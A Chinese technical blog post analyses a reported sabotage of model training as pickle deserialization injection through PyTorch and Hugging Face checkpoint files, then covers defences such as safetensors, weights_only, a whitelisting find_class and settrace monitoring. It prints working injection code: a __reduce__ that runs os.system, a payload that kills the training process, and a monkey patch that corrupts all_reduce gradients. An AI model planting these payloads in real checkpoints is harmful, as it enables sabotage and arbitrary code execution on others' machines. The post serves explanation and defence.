浅析字节事件的Checkpoint安全问题:pickle反序列化漏洞

简介

综合转载:

写在前面:本文不讨论任何涉及涉事人员、企业的话题,援引网传聊天记录内容,仅从技术角度剖析相关安全问题和应对方法。由于本身是做AI框架和NLP的,所以其实在AI安全领域并不专业,如有错误希望大家批评指正。

解析勘误

根据网传的聊天记录,可以得到的有效信息有:

  1. 利用huggingface的load ckpt函数漏洞注入代码
  2. 动态修改
  3. 具体的修改内容,包括optimizer、随机种子、sleep、修改梯度参数,以及随机kill进程。

这个事情其实对Pytorch和Python比较熟的人应该很自然地能想到是pickle漏洞的问题,可以通过序列化文件注入的方式,在反序列化时可以进行任何的代码执行(与执行程序同权限)。

这里首先需要勘误一个内容,这个锅呢,说是huggingface有漏洞,不如说Pytorch有漏洞,更不如说Python一直放任着pickle的问题,全部交由开发者自行维护(所以很多人吐槽企业管理问题也不无道理?)。

先来看一下,所谓的huggingface漏洞。

Huggingface->Pytorch->Pickle漏洞

当我们训练模型时,通常会将模型的权重保存到文件中,以便在检查点保存和稍后加载。最流行的格式是 PyTorch 的状态字典,它是一个 Python 字典对象,将每一层映射到其参数 tensor。我猜大多数人对以下代码片段都很熟悉:

1
2
3
4
5
6
7
# 保存模型权重
state_dict = model.state_dict()
torch.save(state_dict, "model.pt")

# 加载模型权重
state_dict = torch.load("model.pt")
model.load_state_dict(state_dict)

然而,这种方法使用 pickle 来序列化和反序列化整个状态字典对象,引发了安全性问题。原因在于 pickle 并不安全,可能会加载具有与反序列化程序相同权限的任意代码。攻击者可以通过模型权重注入任意代码,造成严重的安全问题。一种攻击模型权重的方法是修改其 __reduce__ 方法来执行任意代码。

1
2
3
4
class Obj:

def __reduce__(self):
return (exec, ("print('hello')",))

如果你将此对象序列化并保存到文件中,那么加载对象时代码就会执行。也就是说,当你加载对象时,你会看到打印出的 “hello”。

涉及技术

Pickle注入

Pickle模块是Python自带的序列化和反序列化模块,其工作原理为序列化时将Python对象转换成字节流,反序列化时把字节流还原成Python对象。因此攻击者可以在序列化的数据里嵌入恶意代码,在反序列化这个数据时,这些恶意代码就会被执行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import pickle
import os

# 构造恶意代码
class Malicious:
def __reduce__(self):
return (os.system, ('echo Hacked!',))

# 序列化恶意对象
malicious_data = pickle.dumps(Malicious())

# 反序列化时执行恶意代码
pickle.loads(malicious_data)

## 执行结果:
Hacked!

这个示例是从jb51的文章[2]直接引用的,其中创建了一个名为Malicious的类。这个类的__reduce__方法返回一个元组,第一个元素是os.system,第二个元素是要执行的命令。当反序列化这个对象时,os.system('echo Hacked!')会被执行,输出“Hacked!”。

可以看到我们能够很简单的借助Pickle注入,实现任意的系统调用(当前OS User权限下),这个时候,进行恶意代码执行非常方便,但是系统调用是有痕迹的,而且较容易排查,所以使用接下来的方法配合才是“王炸”——对源代码没有任何修改(知乎回答中提到的代码审核不会起到任何作用)。

援引一下“AI+Security”第二期《AI/机器学习供应链攻击》[1]分享的slides,其中详细地分析了pickle.load反序列化漏洞:

Monkey Patching

Monkey Patching, a dynamic technique in Python, allows developers and quality assurance engineers (QAEs) to make runtime modifications to classes, objects, or even built-in modules. With its ability to address common pain points in test automation, Monkey Patching in Python has become an invaluable tool in the arsenal of testers and developers.[3]

如引用所示,Monkey Patching是一个被广泛用于自动化测试的技术,可以通过运行时对Python模块、类、对象(函数也是一种对象)等替换,达到灵活测试各种case的目的。

But!反过来说,我可以在运行时随意替换Python代码,且不修改任何源码。举个简单例子:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import torch

def add(x, y):
return x + y + 1

x = torch.tensor(3)
print(torch.add(x, 2))

torch.add = add
print(torch.add(x, 2))

## 执行结果:
## tensor(5)
## tensor(6)

这个例子看到我们轻易地就可以在运行时把torch.add方法进行替换,让其结果+1,得到错误的输出6。

有了这个概念,我们基本上可以操控程序的许多部分,包括导入的库和本地变量。我提供了两个典型场景,展示如何中断训练过程以及篡改模型权重的算术正确性。

场景 1:自动终止训练过程

如上例中的 “hello” 一样,恶意代码可以编写为一个代码字符串。同样,我们可以准备如下代码字符串,创建一个新线程,该线程在 5 秒后终止父进程。此线程在后台运行,因此用户不会注意到任何异常,而 os.kill 不返回错误日志,这使得检测恶意代码变得更加困难。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
AUTO_SHUTDOWN = """
import os
import threading
from functools import partial

# 获取进程 ID
pid = os.getpid()

def inject_code(pid: int):
import time
import os
time.sleep(5)
os.kill(pid, 9)

wrapped_fn = partial(inject_code, pid)
injection_thread = threading.Thread(target=wrapped_fn)
injection_thread.start()
"""

接下来,我们需要将此代码注入到状态字典对象中。结果是,当我们从磁盘加载模型权重时,代码会执行,训练过程会被中断。

1
2
3
4
5
6
7
8
9
10
11
def inject_malicious_code(obj, code_str):
# 绑定一个 reduce 函数到权重上
def reduce(self):
return (exec, (code_str, ))

# 将 reduce 函数绑定到权重的 __reduce__ 方法上
bound_reduce = reduce.__get__(obj, obj.__class__)
setattr(obj, "__reduce__", bound_reduce)
return obj

state_dict = inject_malicious_code(state_dict, AUTO_SHUTDOWN)

场景 2:在集合通信中引入错误

类似地,如果我们想修改集合通信操作的行为,可以在计算过程中引入错误,使得分布式训练中的梯度永远不正确。我们可以准备如下代码字符串,劫持 all_reduce 函数。这个代码字符串对 torch.distributed 模块中的 all_reduce API 进行猴子补丁,并对 tensor 执行加 1 操作。结果是 all-reduce 的结果会比预期结果大。

1
2
3
4
5
6
7
8
9
10
11
HIJACK_ALL_REDUCE = """
import torch.distributed as dist

dist._origin_all_reduce = dist.all_reduce
def hijacked_all_reduce(tensor, *args, **kwargs):
import torch.distributed as dist
tensor = tensor.add_(1)
return dist._origin_all_reduce(tensor, *args, **kwargs)

setattr(dist, "all_reduce", hijacked_all_reduce)
"""

例如,如果你有两个进程,每个进程持有 tensor [0, 1, 2, 3],all-reduce 操作会将各个进程的 tensor 相加,结果是 [0, 2, 4, 6]。然而,如果攻击者注入了恶意代码,结果将变为 [2, 4, 6, 8]

而对于Python而言,其实一直在官网文档上写着安全警告:

由于Pytorch直接使用了Python原生的pickle模块进行模型的序列化,因此一直以来Pytorch模型的序列化保存(.bin/.pth文件)都是有风险的,在hugginface网站托管的部分模型也有通过pickle反序列化漏洞的恶意模型。

那为什么我要先做这个勘误呢?首先,huggingface很早就注意到这个问题,并且针对性推出了safetensors,以保证权重文件序列化的安全性(即只保存读取Tensor和对应key)。

Pytorch的改进

其次,Pytorch实际上也做了改进,在torch.load接口提供了weights_only参数,用来规避此类问题。

所以追根溯源,我们更应该称之为Pickle注入漏洞。

调用栈回溯

其实读到这里大家肯定会有个感觉,明显有可以规避的方案,为什么没有用呢?原因大概率是因为分布式训练代码没人会去动导致的。从huggingface transformers源码入手我们来回溯一下恶意代码到底是怎么注入进去的。

在此之前先科普一个概念,模型训练过程中序列化保存的中间Checkpoint,不仅仅包含模型权重,还包括Optimizer States、Learning rate schecduler和相关的超参配置,问题正是出在了这里。

transformers的trainer在保存时,对这几部分内容是分别实现的,save_model方法中是可以配置保存为safetensors的:

但是optimizer和scheduler的保存则不然(倒是和网传聊天记录的内容相符,从optimizer的ckpt下手的概率最大):

可以看到分了几个不同训练框架的分支,默认使用torch.save,这里以Pytorch原生的fsdp为例,继续step in看看里面是怎么调用的:

继续查看DefaultSavePlanner源码可以发现,其使用的序列化方法就是torch.save:

这时我们再反过来看load时对应的Planner:

可以看到Pytorch明确使用了weights_only=False因此哪怕是模型权重保存为Safetensor,但是Optimizer和Scheduler默认都是使用原生Pickle,并且完全没有对Pickle注入的防范措施。

产生的影响

  1. 对模型收敛性/最终精度的影响,包括但不限于:

    • 改变/扰动梯度下降方向造成的loss突刺和NAN
    • Optimizer States修改造成的断点续训失效
    • 确定性计算不统一
  2. 对集群训练的影响,包括但不限于:

    • 随机sleep造成的进程通信超时
    • 随机kill造成的节点宕机假象

暂时只能猜到这些,看起来能在内网群当“内鬼”能操作的还有很多,这里就交给专业的人去分析吧,我还是从框架和Python用户的视角,针对网传聊天记录的有效信息,对前两个方法进行深入解析。

解决方案

前面把技术点简单解释了下,还是得看看有什么好的办法解决或者阻拦该类事件的发生。(当然,从源头开始的话,把控好人的权限才是最重要的 )。

替换序列化模块

  • Safetensors+json:huggingface已经提供了绝佳的解决方案,虽然序列化时optimizer要比model保存的内容要多一些,但其实也就是key(str): value(Tensor)构成的dict,以及超参数dict,完全可以将其拆分为safetensor和json保存,二者都没有什么代码注入隐患。但是需要自己动手改造checkpoint保存部分的逻辑。
  • Protobuf:全称Google Protocol Buffers,是一种轻便、高效的结构化数据存储格式,可以用于结构化数据序列化。Protobuf是语言无关的序列化框架,独立于Python,也没有代码注入漏洞。(PS:部分框架,如Tensorflow、MindSpore选择此方案)。

Checkpoint校验

除了在序列化反序列化上直接封死注入漏洞外,如果已有的训练已经进行,短时间无法改造,则应该从Checkpoint文件下手,校验文件是否被修改(仅限于类似于字节事件场景下,破坏者需要直接对ckpt文件进行修改的情况,此时文件md5必然改变)。

find_class 重载

这是一个非常好的拦截手段,很难想象Pytorch和huggingface都没有在这里做任何拦截(西方人独有的chill感?)。这里我们打开torch.load源码看一下:

在pickle反序列化过程中,要执行python代码实际上需要Unpickler进行一个find_class的操作,用来找到要执行的模块或对象,这里其实完全可以重载进行过滤。而Pytorch虽然重载了,但是完全没做任何安全性过滤(事实上torch序列化文件需要的反序列化执行函数完全可以统计为白名单)。

这里接前文的例子,我们重载find_class,将可以反序列化的数据类型进行限制,看看效果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
import pickle
import os
import io

# 构造恶意代码
class Malicious:
def __reduce__(self):
return (os.system, ('echo Hacked!',))

# 序列化恶意对象
malicious_data = pickle.dumps(Malicious())

# 自定义Unpickler,限制可反序列化的类型
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
print(module, name)
if module == "builtins" and name in {"str", "list", "dict", "set", "int", "float", "bool"}:
return getattr(__import__(module), name)
raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(s):
return RestrictedUnpickler(io.BytesIO(s)).load()

# 反序列化时执行恶意代码
pickle.loads(malicious_data)
# 限制可反序列化类型,执行恶意代码报错
restricted_loads(malicious_data)


## 执行结果:
# Hacked!
# posix system
# Traceback (most recent call last):
# File "/home/lvyufeng/lvyufeng/test_pickle.py", line 28, in <module>
# restricted_loads(malicious_data)
# File "/home/lvyufeng/lvyufeng/test_pickle.py", line 26, in restricted_loads
# return RestrictedUnpickler(io.BytesIO(s)).load()
# File "/home/lvyufeng/lvyufeng/test_pickle.py", line 23, in find_class
# raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")
# _pickle.UnpicklingError: global 'posix.system' is forbidden

可以看到只要是没有在白名单内的数据类型,可以直接抛错。

Monkey Patching检测

最后再来说一下Monkey Patching检测,这里我们要做一个强假设,即:执行的代码任意位置都可能被修改,且完全不可预知。

因此需要一个全局的检测机制,这里我们可以利用 sys.settrace() 来实时跟踪代码[5]:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import sys

def trace_calls(frame, event, arg):
if event != 'call':
return
co = frame.f_code
func_name = co.co_name
func_filename = co.co_filename
print(f"Call to {func_name} in {func_filename}")
return

# 启用跟踪
sys.settrace(trace_calls)

# 示例
class MyClass:
def my_method(self):
print("Original method")

# Monkey patch
def new_method(self):
print("Monkey patched method")
MyClass.my_method = new_method

# 调用方法,将触发跟踪
MyClass().my_method()


## 执行结果:
# Call to MyClass in /home/lvyufeng/lvyufeng/test_detect_monkey_patch.py
# Call to <lambda> in /home/lvyufeng/lvyufeng/test_detect_monkey_patch.py
# Monkey patched method

可以看到字节码frame对应的name和filename都可以记录,在有monkey patching风险的情况下可以进行全局执行log的排查,看到问题方法。不过这个方法会产生大量log,还是建议最多一个step进行check。

一分一毛,也是心意。